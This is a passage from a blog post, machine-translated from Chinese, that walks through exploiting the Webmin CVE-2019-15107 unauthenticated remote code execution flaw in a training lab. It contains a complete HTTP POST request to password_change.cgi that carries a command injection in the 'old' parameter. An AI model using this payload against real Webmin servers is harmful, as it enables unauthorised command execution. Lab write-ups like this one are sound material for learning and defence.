当前位置:网站首页>Moher College webmin unauthenticated remote code execution
Moher College webmin unauthenticated remote code execution
2022-07-04 07:44:00 【Lyswbb】
First, get to the shooting range and visit , Visit a landing page later

According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication

burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired Execute the command with parameters
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Directly query the root key.txt that will do

边栏推荐
- BibTex中参考文献种类
- Set and modify the page address bar icon favicon ico
- Rhcsa day 3
- Wechat has new functions, and the test is started again
- Comparison between applet framework and platform compilation
- Zephyr 学习笔记2,Scheduling
- L1-024 the day after tomorrow (5 points)
- ZABBIX monitoring system deployment
- Unity 从Inspector界面打开资源管理器选择并记录文件路径
- How to improve your system architecture?
猜你喜欢

ZABBIX monitoring system custom monitoring content

NPM run build error

大学阶段总结

【性能测试】一文读懂Jmeter

Handwritten easy version flexible JS and source code analysis

【Go基础】2 - Go基本语句
![[gurobi] establishment of simple model](/img/3f/d637406bca3888b939bead40b24337.png)
[gurobi] establishment of simple model

Zephyr study notes 2, scheduling

With excellent strength, wangchain technology, together with IBM and Huawei, has entered the annual contribution list of "super ledger"!
![[network security] what is emergency response? What indicators should you pay attention to in emergency response?](/img/2e/96da79d82ae2c49a3a0ab9909467ac.jpg)
[network security] what is emergency response? What indicators should you pay attention to in emergency response?
随机推荐
The idea of implementing charts chart view in all swiftui versions (1.0-4.0) was born
Leetcode(215)——数组中的第K个最大元素
[test de performance] lire jmeter
MySQL中的文本处理函数整理,收藏速查
This monitoring system can monitor the turnover intention and fishing all, and the product page has 404 after the dispute appears
How to reset IntelliSense in vs Code- How to reset intellisense in VS Code?
L1-024 the day after tomorrow (5 points)
Basic DOS commands
ZABBIX 5.0 monitoring client
【Go基础】2 - Go基本语句
真空介电常数和真空磁导率究竟是由什么决定的?为何会存在这两个物理量?
Literature collation and thesis reading methods
L1-023 output gplt (20 points)
zabbix监控系统部署
Relations courantes de la fiche de données d'exploitation pour les activités
Activiti common operation data table relationship
Activiti常见操作数据表关系
Oracle-存储过程与函数
This article is enough for learning advanced mysql
弈柯莱生物冲刺科创板:年营收3.3亿 弘晖基金与淡马锡是股东